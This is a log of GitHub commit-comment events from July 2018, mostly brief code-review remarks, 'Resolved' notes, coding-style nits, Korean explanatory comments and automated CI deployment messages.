{"id":"7906512149","type":"CommitCommentEvent","actor":{"login":"aeranghang"},"repo":{"name":"chacha816/TIL"},"payload":{"comment":{"id":29566143,"position":38,"line":38,"path":"20180702.md","commit_id":"03a98fb5215fca3bfd791e0c508561a2b2c511fa","created_at":"2018-07-02T12:59:06Z","updated_at":"2018-07-02T12:59:06Z","author_association":"NONE","body":"texture -> text"}},"created_at":"2018-07-02T12:59:06Z"}
{"id":"7906514725","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566147,"position":417,"line":207,"path":"agent/webapps/client/src/main/java/com/axway/ats/agent/webapp/client/executors/RemoteExecutor.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T12:59:35Z","updated_at":"2018-07-02T12:59:35Z","author_association":"OWNER","body":"Reolved"}},"created_at":"2018-07-02T12:59:35Z"}
{"id":"7906515022","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29566149,"position":null,"line":null,"path":null,"commit_id":"230db193d30621d1ab27172a533adfcdbbf799d7","created_at":"2018-07-02T12:59:38Z","updated_at":"2018-07-02T12:59:38Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-227](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-227).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-227-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-02T12:59:38Z"}
{"id":"7906517740","type":"CommitCommentEvent","actor":{"login":"taaake"},"repo":{"name":"dovneko/bookis"},"payload":{"comment":{"id":29566156,"position":null,"line":null,"path":null,"commit_id":"7140eeeaf781058e5fcd4c07639f8bdc42cd6c3a","created_at":"2018-07-02T13:00:09Z","updated_at":"2018-07-02T13:00:09Z","author_association":"COLLABORATOR","body":"pushtest"}},"created_at":"2018-07-02T13:00:09Z"}
{"id":"7906519734","type":"CommitCommentEvent","actor":{"login":"hbkmadness"},"repo":{"name":"hyperledger/fabric"},"payload":{"comment":{"id":29566164,"position":null,"line":null,"path":null,"commit_id":"9df3ff5f831b7b658c505254e18de94e7b2a8e97","created_at":"2018-07-02T13:00:27Z","updated_at":"2018-07-02T13:00:27Z","author_association":"NONE","body":"Yes, I can't also download the images. The old script works fine, I understand you have to \"Prepare\" the script for the release but the problem is that it's also updated in the docs and you can't use it since 1.2.0 is not released yet."}},"created_at":"2018-07-02T13:00:27Z"}
{"id":"7906522927","type":"CommitCommentEvent","actor":{"login":"Gammelknup"},"repo":{"name":"freifunk-gluon/gluon"},"payload":{"comment":{"id":29566169,"position":263,"line":263,"path":"docs/releases/v2018.1.rst","commit_id":"6c2e8b9f50dfd2a8ae83f3c9346093d7e953d3c1","created_at":"2018-07-02T13:00:57Z","updated_at":"2018-07-02T13:00:57Z","author_association":"NONE","body":"*mesh-von-tunneldigger* -> *mesh-vpn-tunneldigger*"}},"created_at":"2018-07-02T13:00:57Z"}
{"id":"7906528960","type":"CommitCommentEvent","actor":{"login":"aeranghang"},"repo":{"name":"chacha816/TIL"},"payload":{"comment":{"id":29566183,"position":60,"line":60,"path":"20180702.md","commit_id":"03a98fb5215fca3bfd791e0c508561a2b2c511fa","created_at":"2018-07-02T13:02:06Z","updated_at":"2018-07-02T13:02:06Z","author_association":"NONE","body":"원칙적으로 풀 수는 있지만(computable), 지나치게 오랜 시간이 걸려서 실질적으로는 풀 수 없는(intractable) 종류의 문제들이 있습니다. 이런 문제는 휴리스틱으로 풀어내는 경우가 종종 있습니다. 휴리스틱(heuristics)이란 항상 정답이 나오는걸 보장할 수는 없지만 그럭저럭 쓸만한 답을 찾아내는 절차를 뜻합니다. 휴리스틱을 써도 되는 경우가 있고(예: 팀 배정하기), 써서는 안되는 경우가 있습니다(의료기기 제어 프로그램, 유인 우주선 관련 프로그램 등)."}},"created_at":"2018-07-02T13:02:06Z"}
{"id":"7906529073","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29566184,"position":null,"line":null,"path":null,"commit_id":"d037e8fca53f54a92f41a9330802a85598971086","created_at":"2018-07-02T13:02:07Z","updated_at":"2018-07-02T13:02:07Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180702-130207 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180702-130207\") to [dev](https://console.bluemix.net/apps/6fd8391d-0cdd-414d-8345-ae8a2ead0e5d?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-02T13:02:07Z"}
{"id":"7906533364","type":"CommitCommentEvent","actor":{"login":"Emad-salah"},"repo":{"name":"Emad-salah/bitskins"},"payload":{"comment":{"id":29566195,"position":null,"line":null,"path":null,"commit_id":"91f04efe1fb34a633b20ac0623f26110b3d87b82","created_at":"2018-07-02T13:02:55Z","updated_at":"2018-07-02T13:02:55Z","author_association":"OWNER","body":"Fixed issue where appid doesn't get applied*"}},"created_at":"2018-07-02T13:02:55Z"}
{"id":"7906533474","type":"CommitCommentEvent","actor":{"login":"martinklepsch"},"repo":{"name":"gnl/ghostwheel"},"payload":{"comment":{"id":29566197,"position":5,"line":29,"path":"README.adoc","commit_id":"e4bcb3ef6e80243ec2917617d96356f30e72c730","created_at":"2018-07-02T13:02:57Z","updated_at":"2018-07-02T13:02:57Z","author_association":"NONE","body":"❤️ "}},"created_at":"2018-07-02T13:02:57Z"}
{"id":"7906533833","type":"CommitCommentEvent","actor":{"login":"liuzhiyuanprime"},"repo":{"name":"liuzhiyuanprime/liuzhiyuanprime.github.io"},"payload":{"comment":{"id":29566198,"position":null,"line":null,"path":null,"commit_id":"0e41bca66a3a81d7768251eb12bea1a78ad99dc3","created_at":"2018-07-02T13:03:01Z","updated_at":"2018-07-02T13:03:01Z","author_association":"OWNER","body":"y"}},"created_at":"2018-07-02T13:03:01Z"}
{"id":"7906537030","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566203,"position":1,"line":1,"path":"agent/webapps/server/src/main/config/swagger/templates/markdown.hbs","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:03:37Z","updated_at":"2018-07-02T13:03:37Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:03:37Z"}
{"id":"7906537696","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566204,"position":1,"line":1,"path":"agent/webapps/server/src/main/config/swagger/templates/operation.hbs","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:03:43Z","updated_at":"2018-07-02T13:03:43Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:03:43Z"}
{"id":"7906538327","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29566206,"position":null,"line":null,"path":null,"commit_id":"4b28b2b9b155cc8d3c55ee1763b8feb74ded819c","created_at":"2018-07-02T13:03:50Z","updated_at":"2018-07-02T13:03:50Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 676](https://travis-ci.org/per1234/arduino-ci-script/builds/399114996) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00676-001-tsv"}},"created_at":"2018-07-02T13:03:50Z"}
{"id":"7906538431","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566207,"position":1,"line":1,"path":"agent/webapps/server/src/main/config/swagger/templates/strapdown.html.hbs","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:03:51Z","updated_at":"2018-07-02T13:03:51Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:03:51Z"}
{"id":"7906539096","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29566210,"position":null,"line":null,"path":null,"commit_id":"4b28b2b9b155cc8d3c55ee1763b8feb74ded819c","created_at":"2018-07-02T13:03:58Z","updated_at":"2018-07-02T13:03:58Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 676](https://travis-ci.org/per1234/arduino-ci-script/builds/399114996) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00676"}},"created_at":"2018-07-02T13:03:58Z"}
{"id":"7906539517","type":"CommitCommentEvent","actor":{"login":"iopietro"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29566215,"position":null,"line":null,"path":null,"commit_id":"b13879e619333525026d48364610456e10b1d67f","created_at":"2018-07-02T13:04:03Z","updated_at":"2018-07-02T13:04:03Z","author_association":"COLLABORATOR","body":"It's very weird then."}},"created_at":"2018-07-02T13:04:03Z"}
{"id":"7906541817","type":"CommitCommentEvent","actor":{"login":"sushantpande"},"repo":{"name":"dharaneeshvrd/platform-deployment-manager"},"payload":{"comment":{"id":29566219,"position":26,"line":26,"path":"api/src/main/resources/plugins_summary/base_common.py","commit_id":"f2f2420d8d708c0f1377c23f4f504613b71d7cc2","created_at":"2018-07-02T13:04:29Z","updated_at":"2018-07-02T13:04:29Z","author_association":"NONE","body":"No need of check_in_service_flag. "}},"created_at":"2018-07-02T13:04:29Z"}
{"id":"7906545887","type":"CommitCommentEvent","actor":{"login":"aeranghang"},"repo":{"name":"dataitgirls2/TWL"},"payload":{"comment":{"id":29566229,"position":5,"line":5,"path":"ChaeSongi/2018.07.02.md","commit_id":"c77d128b620c6adea93514d02137bcb317e26774","created_at":"2018-07-02T13:05:14Z","updated_at":"2018-07-02T13:05:14Z","author_association":"CONTRIBUTOR","body":"데이터를 이리저리 변환하고, 다양한 방법으로 시각화하고, 각종 통계량들을 구해보며 가설들을 뽑아내는 단계를 보통 EDA(**exploratory** data analysis)라고 부릅니다. 모델을 만들고 확인하는 과정은 exploration 보다는 confirmation에 가깝습니다."}},"created_at":"2018-07-02T13:05:14Z"}
{"id":"7906546186","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566230,"position":1,"line":1,"path":"agent/webapps/server/src/main/java/com/axway/ats/agent/webapp/agentservice/AgentWsImpl.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:05:16Z","updated_at":"2018-07-02T13:05:16Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:05:16Z"}
{"id":"7906547560","type":"CommitCommentEvent","actor":{"login":"lelmarir"},"repo":{"name":"hibernate/hibernate-orm"},"payload":{"comment":{"id":29566234,"position":9,"line":66,"path":"hibernate-core/src/main/java/org/hibernate/jpa/HibernatePersistenceProvider.java","commit_id":"29d5b417004c07e50df29c23a0d8abb52f934104","created_at":"2018-07-02T13:05:30Z","updated_at":"2018-07-02T13:05:30Z","author_association":"NONE","body":"without this throw, if all the providers fails (and the debug log level is not active) the error will be \"Unable to build Hibernate SessionFactory\". This method should throw the exception, and the caller should handle it (try the next provider or rethrow the exception if no other providers)"}},"created_at":"2018-07-02T13:05:30Z"}
{"id":"7906551807","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29566244,"position":8,"line":21,"path":"tests/Feature/ExampleTest.php","commit_id":"3e9c186685da8d5063f8a3014b775475230551fa","created_at":"2018-07-02T13:06:18Z","updated_at":"2018-07-02T13:06:18Z","author_association":"NONE","body":"coding guidelines - function opening brace on new line"}},"created_at":"2018-07-02T13:06:18Z"}
{"id":"7906553311","type":"CommitCommentEvent","actor":{"login":"sushantpande"},"repo":{"name":"dharaneeshvrd/platform-deployment-manager"},"payload":{"comment":{"id":29566248,"position":79,"line":79,"path":"api/src/main/resources/plugins_summary/flink.py","commit_id":"f2f2420d8d708c0f1377c23f4f504613b71d7cc2","created_at":"2018-07-02T13:06:36Z","updated_at":"2018-07-02T13:06:36Z","author_association":"NONE","body":"take care of print statements."}},"created_at":"2018-07-02T13:06:36Z"}
{"id":"7906554786","type":"CommitCommentEvent","actor":{"login":"dansali1"},"repo":{"name":"CognizantGrads-TeamALT/grizzly-frontend"},"payload":{"comment":{"id":29566250,"position":null,"line":null,"path":null,"commit_id":"d773cb2ee098cebb221a2f81958ae8f141746bfd","created_at":"2018-07-02T13:06:53Z","updated_at":"2018-07-02T13:06:53Z","author_association":"CONTRIBUTOR","body":"Slick carousel isnt being used.\r\nPopper isnt used from what I see.\r\nWe have react strap. Why duplicate with bootstrap?\r\nInline editing is a part of react ions which is already in the list.\r\nWe dont have any jquery."}},"created_at":"2018-07-02T13:06:53Z"}
{"id":"7906557654","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29566257,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-02T13:07:23Z","updated_at":"2018-07-02T13:07:23Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T13:07:23Z"}
{"id":"7906558735","type":"CommitCommentEvent","actor":{"login":"aeranghang"},"repo":{"name":"chaewon0917/TIL"},"payload":{"comment":{"id":29566258,"position":29,"line":29,"path":"20180702.md","commit_id":"a4f220a09e65f604644a365caed759104acef0c0","created_at":"2018-07-02T13:07:34Z","updated_at":"2018-07-02T13:07:34Z","author_association":"NONE","body":"planet -> planning"}},"created_at":"2018-07-02T13:07:34Z"}
{"id":"7906558911","type":"CommitCommentEvent","actor":{"login":"qlikossbuild"},"repo":{"name":"qlik-oss/core-website"},"payload":{"comment":{"id":29566259,"position":null,"line":null,"path":null,"commit_id":"5a1b0040da50bd25d71cd212a08266e0a686fc6e","created_at":"2018-07-02T13:07:35Z","updated_at":"2018-07-02T13:07:35Z","author_association":"CONTRIBUTOR","body":"A generated website with your changes can be accessed here: https://doc-review.qlikcore.com/redirects. The website will automatically be updated if more commits are pushed to the branch."}},"created_at":"2018-07-02T13:07:35Z"}
{"id":"7906562381","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29566267,"position":6,"line":57,"path":"app/Http/Controllers/PincodeController.php","commit_id":"4b0be23c71617c5c7e1bc19b551b3c14c11d1782","created_at":"2018-07-02T13:08:15Z","updated_at":"2018-07-02T13:08:15Z","author_association":"NONE","body":"why max? and why max:30? use `size`"}},"created_at":"2018-07-02T13:08:15Z"}
{"id":"7906563020","type":"CommitCommentEvent","actor":{"login":"spolti"},"repo":{"name":"jboss-container-images/rhpam-7-openshift-image"},"payload":{"comment":{"id":29566270,"position":43,"line":733,"path":"templates/rhpam70-authoring-ha.yaml","commit_id":"99494dacb7f712c7606354b6c90aa9b81c4874d5","created_at":"2018-07-02T13:08:21Z","updated_at":"2018-07-02T13:08:21Z","author_association":"MEMBER","body":"Thanks for the heads up, will add it on the templates again."}},"created_at":"2018-07-02T13:08:21Z"}
{"id":"7906564778","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29566276,"position":11,"line":102,"path":"app/Http/Controllers/PincodeController.php","commit_id":"7364aa1695da8239353885cd20939f2e0007f973","created_at":"2018-07-02T13:08:41Z","updated_at":"2018-07-02T13:08:41Z","author_association":"NONE","body":"coding guidelines: strict check `=== true`"}},"created_at":"2018-07-02T13:08:41Z"}
{"id":"7906566944","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566282,"position":31,"line":60,"path":"agent/webapps/server/src/main/java/com/axway/ats/agent/webapp/restservice/AgentConfigurationServiceImpl.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:09:07Z","updated_at":"2018-07-02T13:09:07Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:09:07Z"}
{"id":"7906567493","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566284,"position":71,"line":99,"path":"agent/webapps/server/src/main/java/com/axway/ats/agent/webapp/restservice/AgentConfigurationServiceImpl.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:09:13Z","updated_at":"2018-07-02T13:09:13Z","author_association":"OWNER","body":"Resolved\r\n"}},"created_at":"2018-07-02T13:09:13Z"}
{"id":"7906568044","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566287,"position":172,"line":262,"path":"agent/webapps/server/src/main/java/com/axway/ats/agent/webapp/restservice/AgentConfigurationServiceImpl.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:09:18Z","updated_at":"2018-07-02T13:09:18Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:09:18Z"}
{"id":"7906569756","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566296,"position":202,"line":310,"path":"agent/webapps/server/src/main/java/com/axway/ats/agent/webapp/restservice/AgentConfigurationServiceImpl.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:09:37Z","updated_at":"2018-07-02T13:09:37Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:09:37Z"}
{"id":"7906570524","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29566298,"position":11,"line":23,"path":"routes/api.php","commit_id":"7364aa1695da8239353885cd20939f2e0007f973","created_at":"2018-07-02T13:09:45Z","updated_at":"2018-07-02T13:09:45Z","author_association":"NONE","body":"use constants"}},"created_at":"2018-07-02T13:09:45Z"}
{"id":"7906573371","type":"CommitCommentEvent","actor":{"login":"Crisspl"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29566311,"position":68,"line":103,"path":"ext/Blur/CBlurPerformer.cpp","commit_id":"af3d17ee53e5852d9987814fdb9e232890556951","created_at":"2018-07-02T13:10:17Z","updated_at":"2018-07-02T13:10:17Z","author_association":"OWNER","body":"Yes"}},"created_at":"2018-07-02T13:10:17Z"}
{"id":"7906573404","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29566312,"position":15,"line":27,"path":"routes/api.php","commit_id":"7364aa1695da8239353885cd20939f2e0007f973","created_at":"2018-07-02T13:10:17Z","updated_at":"2018-07-02T13:10:17Z","author_association":"NONE","body":"new line char at the end. set PHPStorm preferences correctly to automatically set this"}},"created_at":"2018-07-02T13:10:17Z"}
{"id":"7906575983","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29566315,"position":14,"line":35,"path":"app/Core/SyncDB.php","commit_id":"0110e871ba4f9e61d890460207788aa111f1d4ab","created_at":"2018-07-02T13:10:46Z","updated_at":"2018-07-02T13:10:46Z","author_association":"NONE","body":"inconsistent line breaks in the snippet above"}},"created_at":"2018-07-02T13:10:46Z"}
{"id":"7906577797","type":"CommitCommentEvent","actor":{"login":"nicsalv"},"repo":{"name":"Bozzi96/vgswap"},"payload":{"comment":{"id":29566317,"position":null,"line":null,"path":null,"commit_id":"1ca9b515dcb39667a03ef5bb4d5d7a102c330c40","created_at":"2018-07-02T13:11:08Z","updated_at":"2018-07-02T13:11:08Z","author_association":"COLLABORATOR","body":"Non caricare le credenziali :smile: "}},"created_at":"2018-07-02T13:11:08Z"}
{"id":"7906578912","type":"CommitCommentEvent","actor":{"login":"986204478"},"repo":{"name":"986204478/l.free-android"},"payload":{"comment":{"id":29566321,"position":null,"line":null,"path":null,"commit_id":"dea238ea006b94c0c063c891ec0092742a1c8c51","created_at":"2018-07-02T13:11:19Z","updated_at":"2018-07-02T13:11:19Z","author_association":"OWNER","body":"666"}},"created_at":"2018-07-02T13:11:19Z"}
{"id":"7906580854","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29566326,"position":17,"line":38,"path":"app/Http/Controllers/PincodeController.php","commit_id":"0110e871ba4f9e61d890460207788aa111f1d4ab","created_at":"2018-07-02T13:11:41Z","updated_at":"2018-07-02T13:11:41Z","author_association":"NONE","body":"store `$res->groupBy('pincode')` in a separate variable"}},"created_at":"2018-07-02T13:11:41Z"}
{"id":"7906580926","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566327,"position":1,"line":22,"path":"agent/webapps/server/src/main/java/com/axway/ats/agent/webapp/restservice/BaseRestServiceImpl.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:11:41Z","updated_at":"2018-07-02T13:11:41Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:11:41Z"}
{"id":"7906580963","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29566328,"position":15,"line":36,"path":"app/Http/Controllers/PincodeController.php","commit_id":"0110e871ba4f9e61d890460207788aa111f1d4ab","created_at":"2018-07-02T13:11:42Z","updated_at":"2018-07-02T13:11:42Z","author_association":"NONE","body":"use `or`"}},"created_at":"2018-07-02T13:11:42Z"}
{"id":"7906581207","type":"CommitCommentEvent","actor":{"login":"aeranghang"},"repo":{"name":"chaewon0917/TIL"},"payload":{"comment":{"id":29566331,"position":56,"line":56,"path":"20180702.md","commit_id":"a4f220a09e65f604644a365caed759104acef0c0","created_at":"2018-07-02T13:11:44Z","updated_at":"2018-07-02T13:11:44Z","author_association":"NONE","body":"전산학(computer science)이나 컴퓨터 공학(computer engineering)은 계산이나 컴퓨터 구조를 연구하는 학문들인 반면, 소프트웨어 공학은 프로그래밍을 하는 **사람들**이나 소프트웨어 개발 **프로세스**에 좀 더 집중합니다. 모듈화, 재활용, 추상화 등은 소프트웨어 공학에서 중요하게 다루는 주제들입니다."}},"created_at":"2018-07-02T13:11:44Z"}
{"id":"7906581517","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29566332,"position":15,"line":36,"path":"app/Http/Controllers/PincodeController.php","commit_id":"0110e871ba4f9e61d890460207788aa111f1d4ab","created_at":"2018-07-02T13:11:48Z","updated_at":"2018-07-02T13:11:48Z","author_association":"NONE","body":"strict check"}},"created_at":"2018-07-02T13:11:48Z"}
{"id":"7906582465","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29566336,"position":36,"line":61,"path":"app/Http/Controllers/PincodeController.php","commit_id":"0110e871ba4f9e61d890460207788aa111f1d4ab","created_at":"2018-07-02T13:11:59Z","updated_at":"2018-07-02T13:11:59Z","author_association":"NONE","body":"strict check"}},"created_at":"2018-07-02T13:11:59Z"}
{"id":"7906583009","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29566338,"position":43,"line":67,"path":"app/Http/Controllers/PincodeController.php","commit_id":"0110e871ba4f9e61d890460207788aa111f1d4ab","created_at":"2018-07-02T13:12:06Z","updated_at":"2018-07-02T13:12:06Z","author_association":"NONE","body":"line break above this"}},"created_at":"2018-07-02T13:12:06Z"}
{"id":"7906584229","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29566339,"position":75,"line":102,"path":"app/Http/Controllers/PincodeController.php","commit_id":"0110e871ba4f9e61d890460207788aa111f1d4ab","created_at":"2018-07-02T13:12:19Z","updated_at":"2018-07-02T13:12:19Z","author_association":"NONE","body":"coding guidelines"}},"created_at":"2018-07-02T13:12:19Z"}
{"id":"7906584565","type":"CommitCommentEvent","actor":{"login":"ptatian"},"repo":{"name":"NeighborhoodInfoDC/Requests"},"payload":{"comment":{"id":29566341,"position":231,"line":231,"path":"Prog/2018/Washington region feature/tenure by household income.sas","commit_id":"d7f15f728e7e57576d151f045fd979e22a1e0b2c","created_at":"2018-07-02T13:12:22Z","updated_at":"2018-07-02T13:12:22Z","author_association":"CONTRIBUTOR","body":"@lhendey This code seems to work fine, but it generates NOTES because the length of the value in _\\_name\\__ is less than 15 (6 + 9). If you meant that you wanted to keep characters 6 through 9, then you should put `substr(_name_,6,4)`. The third argument is the _number_ of characters to take, not the position of the last character. Or, you could just say `substr(_name_,6)`, which takes all of the remaining characters starting with the 6th, and then you don't have to worry about how long _\\_name\\__ is. "}},"created_at":"2018-07-02T13:12:22Z"}
{"id":"7906585264","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29566351,"position":75,"line":102,"path":"app/Http/Controllers/PincodeController.php","commit_id":"0110e871ba4f9e61d890460207788aa111f1d4ab","created_at":"2018-07-02T13:12:31Z","updated_at":"2018-07-02T13:12:31Z","author_association":"NONE","body":"use `null` (lowercase)"}},"created_at":"2018-07-02T13:12:31Z"}
{"id":"7906592439","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29566378,"position":2,"line":2,"path":"app/Http/Controllers/PincodeController.php","commit_id":"581769eb2aadc69d4b6266814bf62e1b9ec0c5ee","created_at":"2018-07-02T13:13:48Z","updated_at":"2018-07-02T13:13:48Z","author_association":"NONE","body":"remove these details"}},"created_at":"2018-07-02T13:13:48Z"}
{"id":"7906593641","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29566388,"position":13,"line":13,"path":"app/Http/Controllers/PincodeController.php","commit_id":"581769eb2aadc69d4b6266814bf62e1b9ec0c5ee","created_at":"2018-07-02T13:14:00Z","updated_at":"2018-07-02T13:14:00Z","author_association":"NONE","body":"align to a tree structure."}},"created_at":"2018-07-02T13:14:00Z"}
{"id":"7906595444","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29566391,"position":32,"line":32,"path":"app/Http/Controllers/PincodeController.php","commit_id":"581769eb2aadc69d4b6266814bf62e1b9ec0c5ee","created_at":"2018-07-02T13:14:21Z","updated_at":"2018-07-02T13:14:21Z","author_association":"NONE","body":"line break above thsi"}},"created_at":"2018-07-02T13:14:21Z"}
{"id":"7906598687","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29566400,"position":17,"line":17,"path":"app/SyncDB.php","commit_id":"581769eb2aadc69d4b6266814bf62e1b9ec0c5ee","created_at":"2018-07-02T13:14:57Z","updated_at":"2018-07-02T13:14:57Z","author_association":"NONE","body":"split into smaller functions"}},"created_at":"2018-07-02T13:14:57Z"}
{"id":"7906598869","type":"CommitCommentEvent","actor":{"login":"Crisspl"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29566401,"position":180,"line":214,"path":"ext/Blur/CBlurPerformer.cpp","commit_id":"0f65b17c49a815b52e827ebccadfc7b47ca5428c","created_at":"2018-07-02T13:14:59Z","updated_at":"2018-07-02T13:14:59Z","author_association":"OWNER","body":"yes, exactly"}},"created_at":"2018-07-02T13:14:59Z"}
